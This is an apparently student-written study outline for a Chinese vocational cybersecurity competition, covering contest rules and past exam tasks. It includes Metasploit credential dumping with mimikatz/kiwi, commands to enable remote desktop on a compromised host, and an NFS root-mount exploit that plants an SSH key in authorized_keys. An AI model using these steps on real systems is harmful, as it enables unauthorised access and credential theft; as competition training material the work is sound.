2021中职网络空间安全竞赛知识大纲

2022-03-16 19:01:18 浏览数 (2)

规程

网络空间安全赛项(学生组团队)

1、竞赛方式 网络空间安全赛项为学生组团队,比赛时间为180分钟。每个参赛队由2名选手(设场上队长1名)和1名指导教师组成。参赛选手须为2020年度在籍中等职业学校学生、五年制高职一至三年级(含三年级)学生,方可参加比赛。参赛选手不限性别,年龄须不超过21周岁。指导教师须为本校专职教师。报名办法及报名资格详细要求等见《云南省教育厅关于举办2020年云南省职业院校技能大赛的通知》。

2、竞赛内容 重点考核参赛选手网络系统安全策略部署、信息保护、网络安全运维管理的综合实践能力,具体包括: (1)参赛选手能够在赛项提供的服务器上配置各种协议和服务,实现网络系统的运行,并根据网络业务需求配置各种安全策略,以满足应用需求。 (2)赛选手能够根据大赛提供的赛项要求,实施网络空间安全防护操作。 (3)参赛选手能够根据网络实际运行中面临的安全威胁,确定安全策略并部署实施,防范并制止网络恶意入侵和攻击行为。 (4)参赛选手通过分组混合对抗的形式,能够实时防护自己服务器,抵御外界的攻击,同时能够对目标进行渗透和攻击。 (5)竞赛总时长为3个小时,各竞赛阶段安排如下: 序号 内容模块 具体内容 说明 第一阶段 单兵模式系统渗透测试 密码学和VPN 密码学、IPSec VPN、IKE:PreShared Key(预共享密钥认证)、IKE:PKI(公钥架构认证)、SSL VPN等。 操作系统渗透测试及加固 Windows操作系统渗透测试及加固、Linux操作系统渗透测试及加固等。 Web应用渗透测试及加固 SQL Injection(SQL注入)漏洞渗透测试及加固、Command Injection(命令注入)漏洞渗透测试及加固、File Upload(文件上传)漏洞渗透测试及加固、Directory Traversing(目录穿越)漏洞渗透测试及加固、XSS(Cross Site Script)漏洞渗透测试及加固、CSRF(Cross Site Request Forgeries)漏洞渗透测试及加固、Session Hijacking(会话劫持)漏洞渗透测试及加固 网络安全数据分析 能够利用日志收集和分析工具对网络流量收集监控,维护网络安全。 常用渗透扫描工具使用与脚本语言应用 能够利用如Nmap、Nessus、metasploit等常用渗透扫描工具进行信息收集及系统渗透;熟悉shell,Python等脚本语言的应用。 第二阶段 攻防对抗 参赛队之间进行对抗演练 Windows/Linux操作系统安全攻防、Web应用/数据库安全攻防等。 (6)竞赛分值权重和时间安排 序号 内容模块 分值权重 阶段时间 第一阶段 单兵模式系统渗透测试 70% 100分钟 备战阶段 攻防对抗准备工作 0% 20分钟 第二阶段 攻防对抗 30% 60分钟

3、竞赛规则 (1)参赛选手应严格遵守赛场纪律,服从指挥,不得着装学校信息及选手信息的服装,须着装整洁,仪表端庄,讲文明礼貌。各队之间应团结、友好、协作,避免各种矛盾发生。 (2)参赛队在比赛前一天由赛项执委会统一组织熟悉赛场。 (3)选手须提前30分钟检录,15分钟入场,入场时必须出示参赛证和身份证,放场后对号入座,检查比赛所需竞赛设备齐全后,由参赛选手签字确认方可开始比赛。不得私自携带任何软硬件工具(各种便携式电脑、各种移动存储设备等)、技术资源、通信工具。比赛正式开始后方可进行相关工作。开赛15分钟后停止检录,参赛选手如仍未进入赛场,按弃权处理。 (4)竞赛过程中,每个参赛队内部成员之间可以互相沟通,不得向本队之外的任何人员讨论问题,也不得向裁判、巡视和其他必须进入考场的工作人员询问与竞赛项目的操作流程和操作方法有关的问题,如有竞赛题目文字不清、软硬件环境故障的问题时,可向裁判员询问,成员间的沟通谈话不得影响到其他竞赛队伍。 (5)比赛场地或机位由各参赛队领队在报到当天通过抽签决定,比赛期间参赛选手原则上不得离开比赛场地。 (6)如确实发生机器故障,造成比赛中断,必须经主裁判确认后方能更换机位。 (7)比赛过程中,选手须严格遵守操作规程,确保人身及设备安全,并接受裁判员的监督和警示。若因选手因素造成设备故障或损坏,无法继续比赛,裁判长有权决定终止该队比赛;若非因选手个人因素造成设备故障,由裁判长视具体情况做出裁决。 (8)比赛结束(或提前完成)后,参赛队要确认已成功提交比赛要求的文件,裁判员与参赛队队长一起签字确认,参赛队在确认后不得再进行任何操作。 (9)在竞赛过程中,参赛选手如有不服从裁判判决、扰乱赛场秩序、舞弊等不文明行为的,由裁判长按照规定扣减相应分数,情节严重的取消比赛资格,比赛成绩记0分。 (10)其它未尽事宜,将在竞赛指南或赛前说明会向各领队做详细说明。

4、竞赛环境 (1)竞赛场地。竞赛现场设置竞赛区、裁判区、服务区、技术支持区。现场保证良好的采光、照明和通风;提供稳定的水、电和供电应急设备。同时提供所有指导教师休息室1间。 (2)竞赛设备。竞赛设备由执委会和承办校负责提供和保障,竞赛区按照参赛队数量准备比赛所需的软硬件平台,为参赛队提供标准竞赛设备。 (3)竞赛工位。竞赛现场各个工作区配备单相220V/3A以上交流电源。每个比赛工位上标明编号。配备2把工作椅(凳)。 (4)技术支持区为参赛选手比赛提供网络环境部署和网络安全防范。 (5)服务区提供医疗等服务保障。 (6)竞赛工位隔离和抗干扰。竞赛工位之间标有隔离线。

5、技术规范 该赛项涉及的信息网络安全工程在设计、组建过程中,主要有以下7项国家标准,参赛选手在实施竞赛项目中要求遵循如下规范: 序号 标准号 中文标准名称 1 GA/T 1389-2017 《信息安全技术网络安全等级保护定级指南 》 2 GB 17859-1999 《计算机信息系统安全保护等级划分准则》 3 GB/T 20271-2006 《信息安全技术信息系统通用安全技术要求》 4 GB/T 20270-2006 《信息安全技术网络基础安全技术要求》 5 GB/T 20272-2006 《信息安全技术操作系统安全技术要求》 6 GB/T 20273-2006 《信息安全技术数据库管理系统安全技术要求》 7 GA/T 671-2006 《信息安全技术终端计算机系统安全等级技术要求》 8 GB/T 20269-2006 《信息安全技术信息系统安全管理要求》

6、技术平台

(1)比赛器材 序号 设备名称 数量 设备型号 1 网络空间安全技能评测平台 1 中科软磐云系列网络空间安全实战平台PY-B7,磐云PY-B7为1U设备,标配2个千兆以太口,Intel处理器,大于等于16G 内存,SSD SATA硬盘。可扩展多种虚拟化平台,支持多用户并发在线比赛,根据不同的实战任务下发进行自动调度靶机虚拟化模板,为学员提供单兵闯关、分组混战等实际对战模式,提供超过20种不同级别70个的攻防题目。整个过程全自动评判,自定义动画态势展示,成绩详细分析,多端口监控,全程加密。包含往年网络空间安全国赛和省赛部分样题场景。 2 PC机 2 CPU 主频>=2.8GHZ,>=四核四线程;内存>=8G;硬盘>=500G;支持硬件虚拟化。

(2) 软件技术平台: 比赛的应用系统环境主要以Windows和Linux系统为主,涉及如下版本: 1) 物理机安装操作系统:微软 Windows 7(64位)中文试用版。 2) 虚拟机安装操作系统: Windows系统(试用版):Windows XP、Windows 7、Windows2003 Server、Windows2008 Server(根据命题确定)。 Linux系统:Ubuntu、Debian、CentOS(根据命题确定)。

3) 其他主要应用软件为: VMware workstation 12 pro 免费版 Putty 0.67 Python 3 Chrome 浏览器 62.0 RealVNC 客户端 4.6 JDK(Java Development Kit)7.0

7、成绩评定 (1)裁判工作原则 裁判长由赛项执委会推荐,赛前建立健全裁判组。裁判组为裁判长负责制,并设有专职督导人员1-2名,负责比赛过程全程监督,防止营私舞弊。 本赛项拟设裁判1-3名。分为裁判长、现场裁判。 因为本赛项全部分数由计算机自动评分,因此只需进行两次加密,加密后参赛选手中途不得擅自离开赛场。分别由2组加密裁判组织实施加密工作,管理加密结果。监督员全程监督加密过程。 第一组加密裁判,组织参赛选手进行第一次抽签,产生参赛编号,替换选手参赛证等个人身份信息,填写一次加密记录表连同选手参赛证等个人身份信息证件,装入一次加密结果密封袋中单独保管。 第二组加密裁判,组织参赛选手进行第二次抽签,确定赛位号,替换选手参赛编号,填写二次加密记录表连同选手参赛编号,装入二次加密结果密封袋中单独保管。 所有加密结果密封袋的封条均需相应加密裁判和监督人员签字。密封袋在监督人员监督下由加密裁判放置于保密室的保险柜中保存。 (2)裁判评分方法 裁判组负责竞赛机考评分和结果性评分,由裁判长负责竞赛全过程。 竞赛现场派驻监督员、裁判员、技术支持队伍等,分工明确。裁判员负责与参赛选手的交流沟通及试卷等材料的收发,负责设备问题确认和现场执裁;技术支持工程师负责所有工位设备应急,负责执行裁判确认后的设备应急处理。 (3)成绩产生办法 1) 评分阶段: 竞赛阶段 阶段名称 任务阶段 评分方式 第一阶段权重70% 单兵模式系统渗透测试(本阶段由多个任务组成) 任务1 机考评分 任务2 机考评分 …… 机考评分 任务N 机考评分 第二阶段权重30% 分组对抗 系统攻防演练 机考评分 选手向考评服务器中提交每道赛题唯一的“KEY”值或“FLAG”值,所有得分由计算机自动评判,参赛队的得分等于队中两位参赛选手的得分总和。 2) 第一阶段评分规则 第一阶段总分为700分,分为N个任务,每道题的具体分值在赛题中标明;系统自动评分和排名,公开显示在外接大屏幕上。 3) 第二阶段评分规则 第二阶段总分为300分,初始分为100分;每提交1次对手靶机的FLAG值得分,每当被对手提交1次自身靶机的FLAG值扣分,每个对手靶机的FLAG值只能提交一次,得分和扣分的具体分值在赛题中标明。 系统自动启动违规检测和扣分机制,如发现如下违规行为,系统均给予自动扣分,每检测到一次违规行为扣除一次分数,扣分明细显示在扣分榜中,记录在第二阶段总成绩中: ① 启用FLAG检测机制,如发现FLAG异常(譬如:删除、修改、杀进程),记为一次违规行为; ② 启用服务端口检测机制,如发现关闭赛题中要求开启的端口,记为一次违规行为; ③ 靶机服务器IP参数为DHCP自动获取,不允许自行修改,如修改触发上述①和②检测机制; ④ 在加固时间后,选手自己关闭靶机或被他人关闭,触发上述①和②检测机制,且裁判员不予帮助重启; 违反题目中规定的其他违规操作等(参考赛题)。

目录

2020江苏省赛重点: 1

一:windows渗透 1

1.提交445端口对应的服务版本信息 1

6.将最高账户管理员的密码提交 2

7.将回收站内文件的文档内容提交 2

二、ms17_010 3

四:link渗透测试 3

2020陕西省赛重点 4

一、web隐藏信息获取 4

1.主要是考了nmap的脚本参数 源文档里写了答案 就不讲了 4

三、系统漏洞 5

文档:Linux NFS共享目录配置漏洞.note 5

四、linux渗透测试 5

2021长沙市重点 5

没啥好讲的 都是老题 5

2021安徽重点 6

任务一到六都是前面讲了的题 6

任务七有环境 也写了解析 6

文档:福建市赛web解析.note 6

2021广东重点 6

没有重点 有一个靶机是vulnhub Kioptrix4 可以去做做 6

2021江西重点 6

没有重点 就复习一下apache的加固 6

2021宜昌市重点 7

nmap主要都是考了脚本 结合我前面说的技巧找对应关键字的脚本 看能不能找到 7

tomcat中间件渗透 是一个put文件上传漏洞 vulnhub有靶机 好像这个赛题也有靶机 群里有 7

第二阶段 7

2020江苏省赛重点: 一:windows渗透 445端口samba服务 考点只有17010和08067模块利用 1.提交445端口对应的服务版本信息 假设nmap -sV扫描不到版本号 可以尝试msf的smb_version模块进行扫描 enum4linux工具的使用 都是用来探测smb版本信息的 在2021广东省赛中有考到

6.将最高账户管理员的密码提交 首先windows渗透考445端口的话 对应的两个模块都是堆栈溢出 拿到的都是system权限

在msf5及以下版本中: 1:可以使用hashdump导出hash结合hashcat、ophcrack破解 一般情况下不必使用hashcat 除非题目中提供了字典进行爆破 考到windows明文密码的题一般ophcrack都提供了对应的彩虹表可以直接破解

2:load mimikatz(法国神器) 直接msv、ssp、wdigest一条龙拿密码

国赛试点赛用到的kali2020.4 已更新msf6 在msf6中: 3:msf6中已经移除mimikatz 使用kiwi进行替代 kiwi这个模块用得不熟 到时候如果是msf6 直接help kiwi 里面的命令都用用 应该是可以拿到密码的 建议学习一下kiwi的使用

4:mimikatz.exe的使用 国赛试点赛提供了这个exe文件 以前看网上渗透文章经常用到这个 用法与msf5中的mimikatz完全不一样 国赛考了win7的明文密码题 环境就是msf6 只有kiwi 但是没拿到明文密码 不会用mimikatz.exe 导致题目没做出来 所以一定要去百度找找mimikatz.exe的用法

7.将回收站内文件的文档内容提交 将回收站内文件内容提交 打开回收站只能用图形界面操作 意味着必须开启远程桌面或链接可操作的vnc才能够做出这题

在拿到meterpreter后开启远程桌面的方法: 1.meterpreter>getgui -e //这个是直接开启的方法 但不适用于所有场合 具体原理未知 2.reg add 使用修改注册表方式开启 具体命令百度 版本之间也稍有差异 3.wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 //没使用过 但存在这种方法 4.net start termservice //这个和第一个方法我用的最多

拿到meterpreter后开启vnc 以及需要注意的地方: 1.meterpreter>run vnc就会打开vnc连接 但是kali自一个版本之后vnc就变成了view-only 只允许看 不允许操作 之前看到一篇文章讲了这个问题 可以看我的笔记解决这个问题 文档:解决meterpreter下vnc无法操控的问题

解决meterpreter下vnc无法操控的问题

参考这个 https://app.yinxiang.com/fx/653b4dff-a762-4de6-9d35-efc8c4fa5ea1

vim /usr/share/metasploit-framework/scripts/meterpreter/vnc.rb 在if (not courtesy)下添加pay.datastore['ViewOnly'] = false

二、ms17_010 这个任务考的是msf的使用 不仅仅是模块的利用

四:link渗透测试 这个我没有环境 也没做过类似的题

2020陕西省赛重点 一、web隐藏信息获取 1.主要是考了nmap的脚本参数 源文档里写了答案 就不讲了

但是有个方法可以不用背脚本名 nmap的脚本都是.nse文件 在kali里面find / -name *.nse

find出来有很多nse文件 根据目录名可以看出来/usr/share/nmap/scripts/下就是nmap脚本存放的位置 cd到这个目录下 全都是脚本 根据题目的要求 比如说要对dns进行fuzz扫描 就直接找找关键字 就知道对应脚本名了

三、系统漏洞 看了一下整个任务 考的就是nfs挂载目录配置漏洞 这个漏洞在metasploit靶机里有 主要学习showmount命令、mount命令及-t nfs参数的使用 参考笔记

文档:Linux NFS共享目录配置漏洞.note

Linux NFS共享目录配置漏洞

代码语言:javascript复制
安全组织索引
Server:NFS

原理
NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录

影响系统

软件
所有Linux系统的NFS服务

使用工具
Kali linux

利用步骤:
在kali上执行rpcinfo -p 172.16.1.105查看nfs服务有无开启

showmount -e ip 查看其设置的远程目录列表

输入ssh-keygen生成RSA公钥

依次输入:
/etc/init.d/rpcbind start(不报错可不执行)
mount –t nfs 172.16.1.105:/ /tmp/lxj(预先创建),
把172.16.1.105的根目录挂载到/tmp/lxj/下

cat /root/.ssh/id_rsa.pub>>/tmp/lxj/root/.ssh/authorized_keys
把生成的公钥追加到靶机的authorized_keys下

ssh root@172.16.1.105实现ssh无密码登录

四、linux渗透测试 考的是21端口漏洞 大概率就是vsftp234笑脸后门 这个给你讲过手工利用和msf模块都可以 就不说了

2021长沙市重点 没啥好讲的 都是老题

2021安徽重点 任务一到六都是前面讲了的题 任务七有环境 也写了解析 文档:福建市赛web解析.note

2021广东重点 没有重点 有一个靶机是vulnhub Kioptrix4 可以去做做

2021江西重点 没有重点 就复习一下apache的加固

2021宜昌市重点 nmap主要都是考了脚本 结合我前面说的技巧找对应关键字的脚本 看能不能找到 tomcat中间件渗透 是一个put文件上传漏洞 vulnhub有靶机 好像这个赛题也有靶机 群里有

第二阶段 加固时间你加固完了 就用攻击机ping一个其他队的机子 ping通了就马上开始跑脚本 不要等裁判说开始了再开始 那样的话你已经满了别人一大截

欸,,就这样吧。。 还有一个月就深入高职组 啦。。。

0 人点赞